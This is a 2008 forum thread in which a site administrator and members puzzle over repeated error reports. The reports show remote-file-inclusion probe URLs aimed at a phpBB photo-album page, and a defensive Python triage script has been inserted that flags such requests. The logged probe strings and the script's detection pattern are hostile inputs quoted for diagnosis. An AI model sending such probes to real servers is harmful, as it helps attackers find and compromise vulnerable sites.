kal Forum Administrator
Joined: 06 Mar 2006 Posts: 17860 Location: Ottawa, Canada
TV/Projector: JVC DLA-NZ7
Posted: Mon Mar 03, 2008 10:13 pm Post subject: We're being spammed and I can't figure out ...
A free Club Membership to anyone that helps me figure this out!
Whenever the forum throws an error, I get emailed. Helps me keep on top of problems.
For some time now however, I've been getting emails like this:
Code:
General Error Message:
The photo does not exist.
IP: 8.4.9.191
USER: Anonymous
URL: /forum/album_page.php?pic_id=http%3A%2F%2Fwww.felixtorresycia.com%2Fadmin%2Fcorreo%2Fenaq%2Fecib%2F&sid=f5c66f40f47522f6423f81281d79ac5a
FORM:
Array
(
)
The first part of the URL info (/forum/album_page.php?pic_id=) tells me that someone tried to view an image in our Photo Album, but the second half is the spammy made-up part that points to some SPAM site.
This happens every day. Random URLs.
So I'm:
(1) Not sure why someone's doing this (what's the point?)
(2) How they expect this to do something for them?
Kal
_________________
Support our site by using our affiliate links. We thank you!
My basement/HT/bar/brewery build 2.0
Last edited by kal on Mon Mar 03, 2008 10:15 pm; edited 1 time in total
kal Forum Administrator
Joined: 06 Mar 2006 Posts: 17860 Location: Ottawa, Canada
TV/Projector: JVC DLA-NZ7
Posted: Mon Mar 03, 2008 10:14 pm
Here are a few others in case anyone's curious:
Code:
General Error Message:
The photo does not exist.
IP: 8.4.9.191
USER: Anonymous
URL: /forum/album_page.php?pic_id=http%3A%2F%2Fwww.elettrodataservice.it%2Ffoto_articoli%2Fonoda%2Fiyegimi%2F&sid=f5c66f40f47522f6423f81281d79ac5a
FORM:
Array
(
)
Code:
General Error Message:
The photo does not exist.
IP: 216.239.91.165
USER: Anonymous
URL: /forum/album_page.php?pic_id=http%3A%2F%2Fwww.cjp.spb.ru%2Fen%2Ftis%2Fleboma%2F&sid=f9ced0c5f38072cad9e97c9c2ed4055f
FORM:
Array
(
)
Code:
General Error Message:
The photo does not exist.
IP: 216.239.91.165
USER: Anonymous
URL: /forum/album_page.php?pic_id=http%3A%2F%2Fwww.cjp.spb.ru%2Fen%2Ftis%2Fleboma%2F&sid=f9ced0c5f38072cad9e97c9c2ed4055f
FORM:
Array
(
)
Always the same thing, different URL.
Kal
ecrabb Forum Moderator
Joined: 13 Mar 2006 Posts: 15909 Location: Utah
TV/Projector: JVC RS40, Epson 5010
Posted: Mon Mar 03, 2008 11:23 pm
'&sid' is a session id - a unique identifier. When I turn the URL in the second error message above back into a URL:
http://www.cjp.spb.ru/en/tis/leboma/&sid=f9ced0c5f38072cad9e97c9c2ed4055f
I get this error message:
Code:
<?php echo md5("just_a_test");?>
Same with the others. So, it makes a request to a PHP server. I'm guessing the link is databasing hits to track good email addresses to spam. As for why those URLs are ending up pointing to the forum's gallery, that I don't get. Server-side database stuff is way over my head, but I wonder if maybe there is some sort of security hole in phpBB they're exploiting (or trying to exploit)?
Seems like a mistake - maybe a spammer's bad database server config...
Could you search/post in the phpBB user forum - those guys might actually know something there.
SC
kal Forum Administrator
Joined: 06 Mar 2006 Posts: 17860 Location: Ottawa, Canada
TV/Projector: JVC DLA-NZ7
Posted: Tue Mar 04, 2008 12:54 am
Interesting SC. I never followed this thing through but you're right.
That code you mentioned isn't an error message - it's just HTML with embedded PHP code that the web server on their end isn't parsing through correctly first, and therefore their web server just displays the entire code. If their PHP parser was 'on', the end result should be the text "just_a_test" in your browser.
So I understand what's going on, but I still don't understand how the spammers are hoping to accomplish anything, like you said. The photo album URL/feature they're using isn't in the base phpBB code. It's a popular addon mod.
Weird.
Thanks for the input/sleuthing though. I added an extra year to your club membership, just because. You now expire on 2009/10/16 21:00:00 instead of 2008/10/16 21:00:00
Kal
AnalogRocks Forum Moderator
Joined: 08 Mar 2006 Posts: 26690 Location: Toronto, Ontario, Canada
TV/Projector: Sony 1252Q, AMPRO 4000G
Posted: Tue Mar 04, 2008 1:55 am
kal wrote:
SC.
You now expire on 2009/10/16 21:00:00 instead of 2008/10/16 21:00:00
Kal
Whew, a reprieve. Make sure to get your affairs in order. Hell, remember to have some affairs! Before you expire, SC
_________________ Tech support for nothing
CRT.
HD done right!
AnalogRocks Forum Moderator
Joined: 08 Mar 2006 Posts: 26690 Location: Toronto, Ontario, Canada
TV/Projector: Sony 1252Q, AMPRO 4000G
Posted: Tue Mar 04, 2008 1:56 am
Hey Kal, why not turn off the photo albums for a bit and see if those particular spammers/crackers go away and get some cheese to go with them?
ecrabb Forum Moderator
Joined: 13 Mar 2006 Posts: 15909 Location: Utah
TV/Projector: JVC RS40, Epson 5010
Posted: Tue Mar 04, 2008 4:57 am
Geez, Kal - you didn't have to do that. I just like helping when I can - to give back a little to my favorite forum! This place is like my hangout - it's like the clubhouse, man! Thanks a lot, though!!!
OK, so bots are finding Apache PHP boxes running phpBB and trying that little bit of PHP code. If the vulnerability wasn't patched on the server, then that URL would actually work and ping that page with the bogus 'test' message and lodge an entry there. From there, the IP is now in a database and gets put on the list to attempt to install some other vulnerability on the server later... is that about right?
Man, the effort these guys go to!
SC
oliverg
Joined: 15 May 2007 Posts: 800 Location: Melbourne, Australia
TV/Projector: Sony G90 X2 - Vidikron Vision 1
Posted: Tue Mar 04, 2008 12:34 pm
Most of the time, this type of activity is a bot looking for vulnerabilities.
Each server that is found to have holes gets logged, and a database of vulnerable servers can later be used for nefarious purposes.
It's like being port scanned: mostly harmless, as long as you or your host keeps up to date with all the relevant patches.
The same type of thing happens with PCs and spammers using zombies (infected PCs that hackers can exert a level of control over) for mass SMTP relaying.
kal Forum Administrator
Joined: 06 Mar 2006 Posts: 17860 Location: Ottawa, Canada
TV/Projector: JVC DLA-NZ7
Posted: Tue Mar 04, 2008 6:03 pm
Here's another (related?) error that we've been getting for years: Instead of a URL, there's a picture ID that's invalid.
Code:
General Error Message:
The photo does not exist.
IP: 66.249.72.174
USER: Anonymous
URL: /forum/album_page.php?pic_id=26
FORM:
Array
(
)
The pic_id value varies. This one I think is a valid error that someone here is generating, but I've never been able to trace it to the source...
Another value from the last 24 hours:
Code:
General Error Message:
The photo does not exist.
IP: 66.249.72.174
USER: Anonymous
URL: /forum/album_page.php?pic_id=189&mode=next
FORM:
Array
(
)
Kal
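A triage script for these error-report emails, added here as an example; it is not code from this thread, from phpBB, or from the album mod. It pulls the IP and URL out of each report, decodes pic_id, and separates the URL-shaped values ecrabb described (the remote-file-inclusion probe whose fetched file is just `<?php echo md5("just_a_test");?>`) from the plain numeric ids in the reports above, so the two kinds of "photo does not exist" mail can be counted separately. The sample reports are constructed from the ones posted in this thread; the PHP stream wrappers it also flags (php://, data:, expect://, phar://) go beyond anything in the thread and are an assumption about what else an integer-only parameter should never contain.

```python
import hashlib
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample input: three reports in the layout of the forum's error
# mailer, using the IPs and URLs posted in this thread.
SAMPLE_REPORTS = [
    """General Error Message:
The photo does not exist.
IP: 8.4.9.191
USER: Anonymous
URL: /forum/album_page.php?pic_id=http%3A%2F%2Fwww.felixtorresycia.com%2Fadmin%2Fcorreo%2Fenaq%2Fecib%2F&sid=f5c66f40f47522f6423f81281d79ac5a
FORM:
Array
(
)""",
    """General Error Message:
The photo does not exist.
IP: 66.249.72.174
USER: Anonymous
URL: /forum/album_page.php?pic_id=26
FORM:
Array
(
)""",
    """General Error Message:
The photo does not exist.
IP: 66.249.72.174
USER: Anonymous
URL: /forum/album_page.php?pic_id=189&mode=next
FORM:
Array
(
)""",
]

# The probe's remote file is <?php echo md5("just_a_test");?>, so a server that
# included and executed it would answer with this hex digest.
RFI_PROBE_MARKER = hashlib.md5(b"just_a_test").hexdigest()

# A URL (scheme://host or //host) or a PHP stream wrapper in a parameter that
# should only ever hold a picture number. The wrapper list is an assumption.
REMOTE_PATTERN = re.compile(
    r"^(?:[a-z][a-z0-9+.\-]*:)?//|^(?:php|data|expect|phar):", re.IGNORECASE
)


def parse_report(text):
    """Pull the IP: / USER: / URL: header lines out of one error-report body."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"^(IP|USER|URL):\s*(.*)$", line.strip())
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields


def classify_url(url):
    """Classify an album_page.php request by what was passed as pic_id.

    Returns (category, decoded_pic_id, mode); category is 'rfi_probe',
    'numeric_id' or 'malformed'.
    """
    parts = urlsplit(url)
    qs = parse_qs(parts.query, keep_blank_values=True)
    pic_id = qs.get("pic_id", [""])[0]  # parse_qs already percent-decodes
    mode = qs.get("mode", [None])[0]  # e.g. 'next' when the Next button was used
    if REMOTE_PATTERN.search(pic_id):
        return "rfi_probe", pic_id, mode
    if pic_id.isdigit():
        return "numeric_id", pic_id, mode
    return "malformed", pic_id, mode


def triage(reports):
    """Classify every report and tally probe requests per source IP."""
    rows = []
    probes_by_ip = {}
    for text in reports:
        fields = parse_report(text)
        ip = fields.get("IP", "?")
        category, pic_id, mode = classify_url(fields.get("URL", ""))
        rows.append({"ip": ip, "category": category, "pic_id": pic_id, "mode": mode})
        if category == "rfi_probe":
            probes_by_ip[ip] = probes_by_ip.get(ip, 0) + 1
    return rows, probes_by_ip


def response_shows_inclusion(body):
    """True if a page body carries the probe's digest, i.e. the remote file ran."""
    return RFI_PROBE_MARKER in body


if __name__ == "__main__":
    rows, probes = triage(SAMPLE_REPORTS)
    for r in rows:
        print(f"{r['ip']:<15} {r['category']:<11} pic_id={r['pic_id']!r} mode={r['mode']}")
    print("RFI probes per IP:", probes)
```

Running it prints one line per report and a count of probe requests per source IP. `response_shows_inclusion` is the defender-side form of the check the probe itself makes: a server that merely echoes the PHP source back, as the one ecrabb visited did, never contains the digest, while one that actually executed the included file would.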
JustGreg
Joined: 07 Mar 2006 Posts: 3098 Location: Kenosha, WI
Posted: Tue Mar 04, 2008 8:13 pm
If the IP listed is that of the suspect, the first one originated in New York (Latitude: 40.7488, Longitude: -73.9846).
Tracing route to host-8-4-9-191.onlinehorizons.net (8.4.9.191):
Hops ---Avg ms--------Address
1--------- 1 ------------ ****************
2 -------- * ----------- ****************
3 -------- 9 ----------- ************************************************
4 -------- 8 ----------- ************************************************
5 -------- 11 ----------- ************************************************
6 -------- 29 ----------- 24.94.160.33 (so0-0-3.kscymoL3-rtr1.kc.rr.com)
7 -------- 25 ----------- 4.79.132.13 (ge-5-1-203.hsa1.StLouis1.Level3.net)
8 -------- 25 ----------- 4.69.132.186 (ae-11-11.car2.StLouis1.Level3.net)
9 -------- 34 ----------- 4.69.132.190 (ae-4-4.ebr2.Chicago1.Level3.net)
10 ------- 25 ------------ 4.68.101.161 (ae-2-56.bbr2.Chicago1.Level3.net)
11 ------- 45 ------------ 64.159.0.81 (so-0-2-0.mp2.Stamford1.Level3.net)
12 ------- 46 ------------ 4.68.124.98 (so-11-0.hsa1.Stamford1.Level3.net)
13 ------- 46 ------------ 8.4.9.191 (host-8-4-9-191.onlinehorizons.net) New York State
All the asterisks were placed by me... they're the first hops from my PC at the beginning of my query. It wouldn't be very smart to post the route into my PC now, would it?
The second IP is from Canada.
Nothing from Asia or Russia.
Greg
_________________ Greg
"Is it ignorance or apathy? Hey, I don't know and I don't care!" --Jimmy Buffett
Malakay
Joined: 16 Mar 2006 Posts: 49 Location: Germany
Posted: Wed Mar 05, 2008 10:45 pm
The pictures in your error message do not exist.
Try these:
http://www.curtpalme.com/forum/album_page.php?pic_id=26
Insert pic_id numbers at the end of the above line that don't exist and take a look if you get an error message.
I don't know why someone tries to open pics that don't exist; maybe you can ask in the phpBB Forums if this can be used to hack the forum. I'm not a hacker, I don't know.
/Edit: oh, and "&mode=next" only means that someone clicked on the next button on the picture, normal function
ecrabb Forum Moderator
Joined: 13 Mar 2006 Posts: 15909 Location: Utah
TV/Projector: JVC RS40, Epson 5010
Posted: Wed Mar 05, 2008 11:17 pm
Malakay wrote:
I don't know why someone tries to open pics that don't exist; maybe you can ask in the phpBB Forums if this can be used to hack the forum.
That's exactly what Kal was asking. If links to browser pics are all from forum (database)-generated links, there should never be an issue with missing photos.
The only thing I could come up with is that somebody was manually editing the URL hoping to see another few pics that weren't visible in the gallery or something. I actually do that with websites when I see a cool photo associated with a story, and wonder if there are more. For instance, when autoblog covered the new Chevrolet Corvette ZR1, they had a whole bunch of photos from Chevrolet on their server, that weren't available publicly. I found and downloaded them just by changing the number on the end of some of the photos. Got lots of cool pics to download that I haven't seen anywhere else... and probably generated a whole slew of error msgs for the autoblog version of Kal in the process.
SC
kal Forum Administrator
Joined: 06 Mar 2006 Posts: 17860 Location: Ottawa, Canada
TV/Projector: JVC DLA-NZ7
Posted: Thu Mar 06, 2008 1:06 am
ecrabb wrote:
Malakay wrote:
I don't know why someone tries to open pics that don't exist; maybe you can ask in the phpBB Forums if this can be used to hack the forum.
That's exactly what Kal was asking. If links to browser pics are all from forum (database)-generated links, there should never be an issue with missing photos.
Yeah, that's exactly what I was getting at. No idea what code is generating these links that someone then clicks on. I can't figure it out myself.
Quote:
The only thing I could come up with is that somebody was manually editing the URL hoping to see another few pics that weren't visible in the gallery or something.
Don't think so... I've been getting 4-5 of these every day, more or less, for a few years now. It just seems too consistent, and the numbers are never sequential. They're almost random.
Kal